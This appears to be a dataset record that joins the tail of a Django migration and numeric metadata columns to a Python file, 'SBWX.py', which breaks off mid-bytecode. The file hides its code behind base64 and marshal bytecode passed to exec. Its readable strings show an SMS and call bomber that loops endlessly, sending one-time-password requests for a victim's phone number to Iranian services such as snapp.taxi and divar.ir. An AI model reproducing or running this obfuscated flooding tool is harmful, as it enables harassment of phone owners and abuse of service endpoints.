('employee_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='api.Employee')),
],
),
]
| 44.810811
| 120
| 0.565742
| 315
| 3,316
| 5.806349
| 0.222222
| 0.131219
| 0.157463
| 0.209951
| 0.804265
| 0.775834
| 0.758885
| 0.758885
| 0.758885
| 0.758885
| 0
| 0.021601
| 0.287998
| 3,316
| 73
| 121
| 45.424658
| 0.753071
| 0.012967
| 0
| 0.69697
| 1
| 0
| 0.115867
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.030303
| 0
| 0.090909
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
ebdeea581a0a16352789eaf6e7ef18cbdf800afb
| 63,758
|
py
|
Python
|
SBWX.py
|
WIROUX/SBWX
|
068b3744bf4cfca00ab1501a12c687210e3c9829
|
[
"MIT"
] | null | null | null |
SBWX.py
|
WIROUX/SBWX
|
068b3744bf4cfca00ab1501a12c687210e3c9829
|
[
"MIT"
] | null | null | null |
SBWX.py
|
WIROUX/SBWX
|
068b3744bf4cfca00ab1501a12c687210e3c9829
|
[
"MIT"
] | null | null | null |
import base64
exec(base64.b64decode("# yak boos be kalat  
import marshal 
exec(marshal.loads(b'\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s\xb4\x0c\x00\x00d\x00d\x01l\x00Z\x00e\x00\xa0\x01d\x02\xa1\x01\x01\x00e\x00\xa0\x01d\x03\xa1\x01\x01\x00e\x00\xa0\x01d\x04\xa1\x01\x01\x00e\x00\xa0\x01d\x05\xa1\x01\x01\x00d\x00d\x01l\x02Z\x02d\x00d\x01l\x03Z\x03d\x00d\x01l\x04Z\x04d\x00d\x01l\x05Z\x05d\x00d\x01l\x06Z\x06d\x00d\x01l\x07Z\x07e\x07\xa0\x08\xa1\x00Z\te\x00\xa0\x01d\x06\xa1\x01\x01\x00d\x07d\x08\x84\x00Z\nd\x00d\tl\x0bm\x0cZ\r\x01\x00d\x00d\nl\x0em\x0fZ\x0fm\x10Z\x10\x01\x00e\x11e\x0fj\x12d\x0b\x17\x00\x83\x01\x01\x00e\x00\xa0\x01d\x0c\xa1\x01\x01\x00e\x05\xa0\x13d\r\xa1\x01\x01\x00e\x11e\x0fj\x12d\x0e\x17\x00\x83\x01\x01\x00e\x00\xa0\x01d\x0f\xa1\x01\x01\x00e\x05\xa0\x13d\r\xa1\x01\x01\x00e\x00\xa0\x01d\x06\xa1\x01\x01\x00e\x11e\x0fj\x14d\x10\x17\x00e\x0fj\x15\x17\x00d\x11\x17\x00e\x0fj\x16\x17\x00d\x12\x17\x00e\x0fj\x17\x17\x00d\x13\x17\x00e\x0fj\x14\x17\x00d\x14\x17\x00e\x0fj\x15\x17\x00d\x15\x17\x00e\x0fj\x16\x17\x00d\x16\x17\x00e\x0fj\x17\x17\x00d\x17\x17\x00e\x0fj\x14\x17\x00d\x18\x17\x00e\x0fj\x15\x17\x00d\x15\x17\x00e\x0fj\x16\x17\x00d\x16\x17\x00e\x0fj\x17\x17\x00d\x19\x17\x00e\x0fj\x14\x17\x00d\x1a\x17\x00e\x0fj\x15\x17\x00d\x1b\x17\x00e\x0fj\x16\x17\x00d\x16\x17\x00e\x0fj\x17\x17\x00d\x1c\x17\x00e\x0fj\x14\x17\x00d\x1d\x17\x00e\x0fj\x15\x17\x00d\x1e\x17\x00e\x0fj\x16\x17\x00d\x16\x17\x00e\x0fj\x17\x17\x00d\x1f\x17\x00e\x0fj\x14\x17\x00d \x17\x00e\x0fj\x15\x17\x00d!\x17\x00e\x0fj\x16\x17\x00d\x16\x17\x00e\x0fj\x17\x17\x00d"\x17\x00e\x0fj\x14\x17\x00d#\x17\x00e\x0fj\x15\x17\x00d\x15\x17\x00e\x0fj\x16\x17\x00d$\x17\x00e\x0fj\x17\x17\x00d%\x17\x00e\x0fj\x14\x17\x00d&\x17\x00e\x0fj\x15\x17\x00d\'\x17\x00e\x0fj\x16\x17\x00d(\x17\x00e\x0fj\x17\x17\x00d)\x17\x00\x83\x01\x01\x00e\x11e\x0fj\x18d*\x17\x00\x83\x01\x01\x00e\x11e\x0fj\x18d+\x17\x00\x83\x01\x01\x00e\x00\xa0\x01d,\xa1\x01\x01\x00e\x11e\x0fj\x17d-\x17\x00e\x0fj\x19\x17\x00d.\x17\x00e\x0fj\x1a\x17\x00d/\x17\x00e\x0fj\x1b\x17\x00d0\x17\x00e\x0fj\x1a\x17\x00d1\x17\x00e\x0fj\x16\x17\x00d2\x17\x00e\x0fj\x19\x17\x00d3\x17\x00e\x0fj\x19\x17\x00d.\x17\x00e\x0fj\x1a\x17\x00d/\x17\x00e\x0fj\x1b\x17\x00d4\x17\x00e\x0fj\x1a\x17\x00d5\x17\x00e\x0fj\x16\x17\x00d6\x17\x00e\x0fj\x19\x17\x00d7\x17\x00e\x0fj\x19\x17\x00d8\x17\x00e\x0fj\x1a\x17\x00d9\x17\x00e\x0fj\x1b\x17\x00d:\x17\x00e\x0fj\x1a\x17\x00d1\x17\x00e\x0fj\x16\x17\x00d;\x17\x00e\x0fj\x19\x17\x00d<\x17\x00e\x0fj\x19\x17\x00d=\x17\x00e\x0fj\x1a\x17\x00d>\x17\x00e\x0fj\x1b\x17\x00d?\x17\x00e\x0fj\x1a\x17\x00d1\x17\x00e\x0fj\x16\x17\x00d@\x17\x00e\x0fj\x19\x17\x00dA\x17\x00e\x0fj\x17\x17\x00dB\x17\x00\x83\x01\x01\x00e\x11e\x0fj\x14dC\x17\x00e\x0fj\x15\x17\x00dD\x17\x00e\x0fj\x14\x17\x00dE\x17\x00e\x0fj\x15\x17\x00dF\x17\x00\x83\x01\x01\x00e\x00\xa0\x01dG\xa1\x01\x01\x00e\x05\xa0\x13dH\xa1\x01\x01\x00e\x00\xa0\x01dI\xa1\x01\x01\x00e\x11e\x0fj\x17dJ\x17\x00e\n\x83\x00\x17\x00\x83\x01\x01\x00e\x1ce\x0fj\x18dK\x17\x00e\x0fj\x1a\x17\x00d8\x17\x00e\x0fj\x1b\x17\x00dL\x17\x00e\x0fj\x1d\x17\x00dM\x17\x00e\x0fj\x1b\x17\x00dN\x17\x00e\x0fj\x1d\x17\x00dM\x17\x00e\x0fj\x1b\x17\x00d?\x17\x00e\x0fj\x1a\x17\x00dO\x17\x00e\x0fj\x18\x17\x00dP\x17\x00e\x0fj\x1a\x17\x00d8\x17\x00e\x0fj\x1b\x17\x00d0\x17\x00e\x0fj\x1a\x17\x00dO\x17\x00e\x0fj\x19\x17\x00dQ\x17\x00\x83\x01Z\x1ee\x1ed0k\x02\x90\x05r\ne\x00\xa0\x01d\x06\xa1\x01\x01\x00e\x05\xa0\x13dR\xa1\x01\x01\x00e\x00\xa0\x01d\x06\xa1\x01\x01\x00e\x11e\x0fj\x14dS\x17\x00e\x0fj\x1d\x17\x00dT\x17\x00e\x0fj\x1a\x17\x00dU\x17\x00e\x0fj\x1d\x17\x00dV\x17\x00e\x0fj\x19\x17\x00dW\x17\x00e\x0fj\x1b\x17\x00dX\x17\x00e\x0fj\x14\x17\x00dY\x17\x00e\x0fj\x1d\x17\x00dT\x17\x00e\x0fj\x1a\x17\x00dU\x17\x00e\x0fj\x1d\x17\x00dV\x17\x00e\x0fj\x19\x17\x00dZ\x17\x00e\x0fj\x15\x17\x00d/\x17\x00e\n\x83\x00\x17\x00d1\x17\x00e\x0fj\x14\x17\x00d[\x17\x00e\x0fj\x1d\x17\x00dT\x17\x00e\x0fj\x1a\x17\x00dU\x17\x00e\x0fj\x1d\x17\x00dV\x17\x00e\x0fj\x19\x17\x00d\\\x17\x00e\x0fj\x15\x17\x00d]\x17\x00e\tj\x01\x17\x00d]\x17\x00e\x0fj\x14\x17\x00d[\x17\x00e\x0fj\x1d\x17\x00dT\x17\x00e\x0fj\x1a\x17\x00dU\x17\x00e\x0fj\x1d\x17\x00dV\x17\x00e\x0fj\x19\x17\x00d^\x17\x00e\x0fj\x15\x17\x00d]\x17\x00e\tj\x1f\x17\x00d]\x17\x00e\x0fj\x14\x17\x00d_\x17\x00e\x0fj\x1d\x17\x00dT\x17\x00e\x0fj\x1a\x17\x00dU\x17\x00e\x0fj\x1d\x17\x00dV\x17\x00e\x0fj\x19\x17\x00d`\x17\x00e\x0fj\x15\x17\x00d]\x17\x00e\tj \x17\x00d]\x17\x00e\x0fj\x14\x17\x00da\x17\x00e\x0fj\x1d\x17\x00dT\x17\x00e\x0fj\x1a\x17\x00dU\x17\x00e\x0fj\x1d\x17\x00dV\x17\x00e\x0fj\x19\x17\x00db\x17\x00e\x0fj\x15\x17\x00d]\x17\x00e\tj!\x17\x00d]\x17\x00e\x0fj\x14\x17\x00dc\x17\x00e\x0fj\x1d\x17\x00dT\x17\x00e\x0fj\x1a\x17\x00dU\x17\x00e\x0fj\x1d\x17\x00dV\x17\x00e\x0fj\x19\x17\x00dd\x17\x00e\x0fj\x15\x17\x00d]\x17\x00e\tj"\x17\x00d]\x17\x00e\x0fj\x14\x17\x00de\x17\x00\x83\x01\x01\x00e\x1ce\x0fj\x16df\x17\x00e\x0fj#\x17\x00dg\x17\x00e\x0fj\x1b\x17\x00dh\x17\x00e\x0fj\x1d\x17\x00di\x17\x00\x83\x01Z$dje$\x17\x00Z%dke&f\x02dldm\x84\x04Z\'dke&f\x02dndo\x84\x04Z(dpdq\x84\x00Z)drds\x84\x00Z*dtdu\x84\x00Z+dvdw\x84\x00Z,dxdy\x84\x00Z-dzd{\x84\x00Z.d|d}\x84\x00Z/d~d\x7f\x84\x00Z0d\x80d\x81\x84\x00Z1d\x82d\x83\x84\x00Z2d\x84d\x85\x84\x00Z3d\x86d\x87\x84\x00Z4d\x88d\x89\x84\x00Z5d\x8ad\x8b\x84\x00Z6d\x8cd\x8d\x84\x00Z7d\x8ed\x8f\x84\x00Z8d\x90d\x91\x84\x00Z9d\x92d\x93\x84\x00Z:d\x94d\x95\x84\x00Z;d\x96d\x97\x84\x00Z<d\x98d\x99\x84\x00Z=d\x9ad\x9b\x84\x00Z>d\x9cd\x9d\x84\x00Z?d\x9ed\x9f\x84\x00Z@d\xa0d\xa1\x84\x00ZAd\xa2d\xa3\x84\x00ZBd\xa4d\xa5\x84\x00ZCd\xa6d\xa7\x84\x00ZDd\xa8d\xa9\x84\x00ZEd\xaad\xab\x84\x00ZFd\xacd\xad\x84\x00ZGd\xaed\xaf\x84\x00ZHd\xb0d\xb1\x84\x00ZId\xb2d\xb3\x84\x00ZJd\xb4d\xb5\x84\x00ZKd\xb6d\xb7\x84\x00ZLd\xb8d\xb9\x84\x00ZMd\xbad\xbb\x84\x00ZNd\xbcdo\x84\x00Z(d\xbdd\xbe\x84\x00ZOe\re)d\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\re*d\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\re+d\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\re,d\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\re.d\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\re/d\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\re0d\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\re1d\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\re2d\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\re3d\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\re4d\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\re5d\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\re6d\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\re7d\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\re8d\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\re9d\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\re:d\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\re;d\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\re<d\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\re=d\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\re>d\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\re?d\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\re@d\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\reAd\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\reBd\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\reCd\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\reDd\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\reEd\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\reFd\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\reGd\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\reHd\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\re-d\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\reId\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\reJd\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\reKd\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\reLd\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\reMd\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\reNd\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\re(d\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\reOd\xbf\x8d\x01\xa0P\xa1\x00\x01\x00d\x01S\x00e\x1edLk\x02\x90\x05s\x14e\x1ed4k\x02\x90\x05rce\x00\xa0\x01d\x06\xa1\x01\x01\x00e\x00\xa0\x01d\xc0\xa1\x01\x01\x00e\x1cd\xc1\x83\x01ZQeQd\xc2k\x02\x90\x05s,eQd\xc3k\x02\x90\x05rDe\x00\xa0\x01d\xc4\xa1\x01\x01\x00e\x11e\x0fj\x1ad\xc5\x17\x00\x83\x01\x01\x00e\x05\xa0\x13d\r\xa1\x01\x01\x00e\x00\xa0\x01d\xc6\xa1\x01\x01\x00d\x01S\x00eQd\xc7k\x02\x90\x05sNeQd\xc8k\x02\x90\x05rae\x11e\x0fj\x1ad\xc9\x17\x00\x83\x01\x01\x00e\x05\xa0\x13d\r\xa1\x01\x01\x00e\x00\xa0\x01d\xca\xa1\x01\x01\x00d\x01S\x00d\x01S\x00e\x1edNk\x02\x90\x05sme\x1ed:k\x02\x90\x05r\xa2e\x00\xa0\x01d\x06\xa1\x01\x01\x00e\x11e\x0fj\x1bd\xcb\x17\x00\x83\x01\x01\x00e\x11e\x0fj\x18d\xcc\x17\x00\x83\x01\x01\x00e\x05\xa0\x13d\xcd\xa1\x01\x01\x00e\x11d\xce\x83\x01\x01\x00e\x05\xa0\x13d\xcd\xa1\x01\x01\x00e\x11dN\x83\x01\x01\x00e\x05\xa0\x13d\xcd\xa1\x01\x01\x00e\x11dL\x83\x01\x01\x00e\x00\xa0\x01d\xcf\xa1\x01\x01\x00d\x01S\x00e\x1ed?k\x02\x90\x05s\xace\x1edjk\x02\x90\x06rTe\x00\xa0\x01d\x06\xa1\x01\x01\x00e\x00\xa0\x01d\xd0\xa1\x01\x01\x00e\x1ce\x0fj\x18d\xd1\x17\x00\x83\x01ZMeMd\xc2k\x02\x90\x05s\xc7eMd\xc3k\x02\x90\x05r\xdde\x00\xa0\x01d\xd2\xa1\x01\x01\x00e\x00\xa0\x01d\x06\xa1\x01\x01\x00e\x11e\x0fj\x17d\xd3\x17\x00\x83\x01\x01\x00eR\x83\x00\x01\x00d\x01S\x00eMd\xc7k\x02\x90\x05s\xe7eMd\xc8k\x02\x90\x06rVe\x00\xa0\x01d\xd4\xa1\x01\x01\x00e\x1ce\x0fj\x14d\xd5\x17\x00\x83\x01ZSeSd\xc2k\x02\x90\x05s\xfdeSd\xc3k\x02\x90\x06r\x10e\x11e\x0fj\x1ad\xd6\x17\x00\x83\x01\x01\x00e\x05\xa0\x13d\xcd\xa1\x01\x01\x00e\x00\xa0\x01d\xca\xa1\x01\x01\x00d\x01S\x00eSd\xc7k\x02\x90\x06s\x1aeSd\xc8k\x02\x90\x06rXe\x00\xa0\x01d\xd2\xa1\x01\x01\x00e\x11e\x0fj\x14d\xd7\x17\x00\x83\x01\x01\x00e\x05\xa0\x13d\xd8\xa1\x01\x01\x00e\x11e\x0fj\x16d\xd9\x17\x00\x83\x01\x01\x00e\x05\xa0\x13d\xd8\xa1\x01\x01\x00e\x11e\x0fj\x16d\xda\x17\x00\x83\x01\x01\x00e\x05\xa0\x13d\xd8\xa1\x01\x01\x00e\x11e\x0fj\x16dL\x17\x00\x83\x01\x01\x00e\x05\xa0\x13d\xdb\xa1\x01\x01\x00eR\x83\x00\x01\x00d\x01S\x00d\x01S\x00d\x01S\x00d\x01S\x00)\xdc\xe9\x00\x00\x00\x00Nz\x1apip3 install --upgrade pipz\x15pip3 install coloramaz\x15pip3 install requestsz\x15pkg install espeak -y\xda\x05clearc\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s$\x00\x00\x00z\x07t\x00\xa0\x01d\x01\xa1\x01j\x02W\x00S\x00\x01\x00\x01\x00\x01\x00t\x03j\x04d\x02\x17\x00\x06\x00Y\x00S\x00)\x03Nz!https://api.ipify.org?format=textz\x1dna moshakhas nis dash bemolla)\x05\xda\x08requests\xda\x03get\xda\x04text\xda\x04Fore\xda\x04CYAN\xa9\x00r\x08\x00\x00\x00r\x08\x00\x00\x00\xda\x00\xda\x02sw\x0f\x00\x00\x00s\x08\x00\x00\x00\x02\x01\x0e\x01\x06\x01\x0e\x01r\n\x00\x00\x00)\x01\xda\x06Thread)\x02r\x06\x00\x00\x00\xda\x04Backz"Hello, thank you for using my toolz2espeak "Hello, thank you for using my tool" -s 120\xe9\x01\x00\x00\x00z.salam , mamnon ke az abzr man estefadeh mikonizEespeak "salam , mamnon, ke, as, abzar, man, estfadeh, mikony." s- 120u\x1f\x00\x00\x00\n   \xe2\x96\x84\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88u#\x00\x00\x00 \xe2\x96\x80\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x84 u\x14\x00\x00\x00  \xe2\x96\x84\xe2\x96\x88     \xe2\x96\x88\xe2\x96\x84 u\'\x00\x00\x00 \xe2\x96\x80\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88    \xe2\x96\x90\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x80 u\x19\x00\x00\x00\n  \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88    \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88u\x19\x00\x00\x00   \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88    \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88u\x18\x00\x00\x00 \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88     \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88u#\x00\x00\x00   \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x8c   \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x80  u\x17\x00\x00\x00\n  \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88    \xe2\x96\x88\xe2\x96\x80 u\x1f\x00\x00\x00    \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88  \xe2\x96\x90\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88    u\x13\x00\x00\x00\n  \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88       u!\x00\x00\x00  \xe2\x96\x84\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x88\xe2\x96\x88\xe2\x96\x80 u#\x00\x00\x00    \xe2\x96\x80\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x84\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x80    u%\x00\x00\x00\n\xe2\x96\x80\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88u#\x00\x00\x00 \xe2\x96\x80\xe2\x96\x80\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x88\xe2\x96\x88\xe2\x96\x84 u!\x00\x00\x00    \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x80\xe2\x96\x88\xe2\x96\x88\xe2\x96\x84     u\x13\x00\x00\x00\n         \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88u\x19\x00\x00\x00   \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88    \xe2\x96\x88\xe2\x96\x88\xe2\x96\x84u!\x00\x00\x00   \xe2\x96\x90\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88  \xe2\x96\x80\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88    u\x17\x00\x00\x00\n   \xe2\x96\x84\xe2\x96\x88    \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88u\x1e\x00\x00\x00 \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88 \xe2\x96\x84\xe2\x96\x88\xe2\x96\x84 \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88u!\x00\x00\x00  \xe2\x96\x84\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88     \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x84  u!\x00\x00\x00\n \xe2\x96\x84\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x80 u#\x00\x00\x00 \xe2\x96\x84\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x80 u\x1e\x00\x00\x00  \xe2\x96\x80\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x80\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x80 u!\x00\x00\x00 \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88       \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x84 z\x1dTeam : https://t.me/SaDWX_TM\nz\x11programmer: SaDWXz\x1exdg-open https://t.me/SaDWX_TMz)________________________________________\nz\x05[    \xfa\x01<Z\x05SaDWX\xfa\x01>z\x10Srart Sms bomberz\r           ]\nZ\x0201z\x02> z\x1bchat programer for questionz\x04  ]\n\xfa\x01[z\x05    <Z\x0202z\ranother Toolsz\x13                 ]\nz\x03[  z\x03  <Z\x0200z\n Exit Toolz\x15                    ]z)\n````````````````````````````````````````z\x04Sms z\x04and z\x05call z\x07bobmer\nzFespeak "I have no responsibility for your actions in this tool" -s 120\xe9\x02\x00\x00\x00zKespeak "man , hich , masuliiat , daar , estefadeh , shoma , nadaram" -s 120z\x08 IP >>> z\x10pls enter number\xda\x011\xfa\x01/\xda\x012\xfa\x01]z\x15 and for start enter z\x04+>>>\xe9\x03\x00\x00\x00z\r\n\n  /\\       \xda\x01{\xfa\x01!z\x02} z\x19Warning SMS bomb is here z\x03!!!z\x0c\n /  \\      z\x0cYour ip is: z\x0c\n |  |      z\rSystem name: r\t\x00\x00\x00z\x0cUser name : z\x0c\n/ == \\     z\nVersion : z\x0c\n|/**\\|     z\x0fMachine name : z\x0c\n           z\x11Processor info : z\x05\n    z\rphone number z\x04>>> z\x02 +z\t98/1 >>> \xda\x010\xda\x03urlc\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x07\x00\x00\x00C\x00\x00\x00s\xd6\x00\x00\x00zMt\x00j\x01|\x00|\x01d\x01d\x02\x8d\x03j\x02}\x03|\x03d\x03k\x02r(t\x03t\x04j\x05|\x02d\x04\x17\x00t\x04j\x06\x17\x00d\x05\x17\x00t\x04j\x05\x17\x00d\x06\x17\x00t\x04j\x07\x17\x00d\x07\x17\x00\x83\x02\x01\x00W\x00d\x00S\x00t\x03t\x04j\x06|\x02d\x08\x17\x00t\x04j\x08\x17\x00d\t\x17\x00t\x04j\x06\x17\x00d\x06\x17\x00t\x04j\t\x17\x00d\n\x17\x00d\x0bt\x04j\n\x17\x00d\x0c\x17\x00t\x04j\x06\x17\x00d\r\x17\x00|\x03\x83\x04\x01\x00W\x00d\x00S\x00\x01\x00\x01\x00\x01\x00t\x03t\x04j\x06|\x02d\x08\x17\x00t\x04j\x08\x17\x00d\t\x17\x00t\x04j\x06\x17\x00d\x06\x17\x00t\x04j\t\x17\x00d\x0e\x17\x00\x83\x02\x01\x00Y\x00d\x00S\x00)\x0fN\xe9\x05\x00\x00\x00)\x02\xda\x04json\xda\x07timeout\xe9\xc8\x00\x00\x00r\x10\x00\x00\x00\xfa\x01+r\x15\x00\x00\x00\xda\x04send\xfa\x02 [\xfa\x01-\xfa\x06 error\xfa\x05code \xfa\x01=r\x0f\x00\x00\x00\xfa\x0e network error)\x0br\x03\x00\x00\x00Z\x04post\xda\x0bstatus_code\xda\x05printr\x06\x00\x00\x00\xda\x05GREEN\xda\x03RED\xda\x0cLIGHTBLUE_EX\xda\x06YELLOW\xda\x0bLIGHTRED_EX\xda\x0cLIGHTCYAN_EX)\x04r\x1a\x00\x00\x00r\x1c\x00\x00\x00\xda\x04name\xda\x01rr\x08\x00\x00\x00r\x08\x00\x00\x00r\t\x00\x00\x00\xda\x01pE\x00\x00\x00s\x0e\x00\x00\x00\x02\x01\x12\x01\x08\x014\x01L\x02\x06\x014\x01r1\x00\x00\x00c\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x07\x00\x00\x00C\x00\x00\x00s\xd4\x00\x00\x00zLt\x00j\x01|\x00d\x01d\x02\x8d\x02j\x02}\x02|\x02d\x03k\x02r\'t\x03t\x04j\x05|\x01d\x04\x17\x00t\x04j\x06\x17\x00d\x05\x17\x00t\x04j\x05\x17\x00d\x06\x17\x00t\x04j\x07\x17\x00d\x07\x17\x00\x83\x02\x01\x00W\x00d\x00S\x00t\x03t\x04j\x06|\x01d\x08\x17\x00t\x04j\x08\x17\x00d\t\x17\x00t\x04j\x06\x17\x00d\x06\x17\x00t\x04j\t\x17\x00d\n\x17\x00d\x0bt\x04j\n\x17\x00d\x0c\x17\x00t\x04j\x06\x17\x00d\r\x17\x00|\x02\x83\x04\x01\x00W\x00d\x00S\x00\x01\x00\x01\x00\x01\x00t\x03t\x04j\x06|\x01d\x08\x17\x00t\x04j\x08\x17\x00d\t\x17\x00t\x04j\x06\x17\x00d\x06\x17\x00t\x04j\t\x17\x00d\x0e\x17\x00\x83\x02\x01\x00Y\x00d\x00S\x00)\x0fNr\x1b\x00\x00\x00)\x01r\x1d\x00\x00\x00r\x1e\x00\x00\x00r\x10\x00\x00\x00r\x1f\x00\x00\x00r\x15\x00\x00\x00r \x00\x00\x00r!\x00\x00\x00r"\x00\x00\x00r#\x00\x00\x00r$\x00\x00\x00r%\x00\x00\x00r\x0f\x00\x00\x00r&\x00\x00\x00)\x0br\x03\x00\x00\x00r\x04\x00\x00\x00r\'\x00\x00\x00r(\x00\x00\x00r\x06\x00\x00\x00r)\x00\x00\x00r*\x00\x00\x00r+\x00\x00\x00r,\x00\x00\x00r-\x00\x00\x00r.\x00\x00\x00)\x03r\x1a\x00\x00\x00r/\x00\x00\x00r0\x00\x00\x00r\x08\x00\x00\x00r\x08\x00\x00\x00r\t\x00\x00\x00\xda\x01gN\x00\x00\x00s\x0e\x00\x00\x00\x02\x01\x10\x01\x08\x014\x01L\x02\x06\x014\x01r2\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x04\x00\x00\x00C\x00\x00\x00\xf3\x18\x00\x00\x00\t\x00d\x02t\x00i\x01}\x00t\x01d\x03|\x00d\x04\x83\x03\x01\x00q\x01)\x05NT\xda\tcellphonez5https://app.snapp.taxi/api/api-passenger-oauth/v2/otp\xda\x04snap\xa9\x02\xda\x06numberr1\x00\x00\x00\xa9\x01r\x1c\x00\x00\x00r\x08\x00\x00\x00r\x08\x00\x00\x00r\t\x00\x00\x00r5\x00\x00\x00W\x00\x00\x00\xf3\x08\x00\x00\x00\x02\x01\x08\x01\x0c\x01\x02\xfer5\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x04\x00\x00\x00C\x00\x00\x00r3\x00\x00\x00)\x05NT\xda\x05phonez)https://api.divar.ir/v5/auth/authenticateZ\x05Divar\xa9\x02\xda\x0bfull_numberr1\x00\x00\x00r8\x00\x00\x00r\x08\x00\x00\x00r\x08\x00\x00\x00r\t\x00\x00\x00\xda\x05divar\\\x00\x00\x00r9\x00\x00\x00r=\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x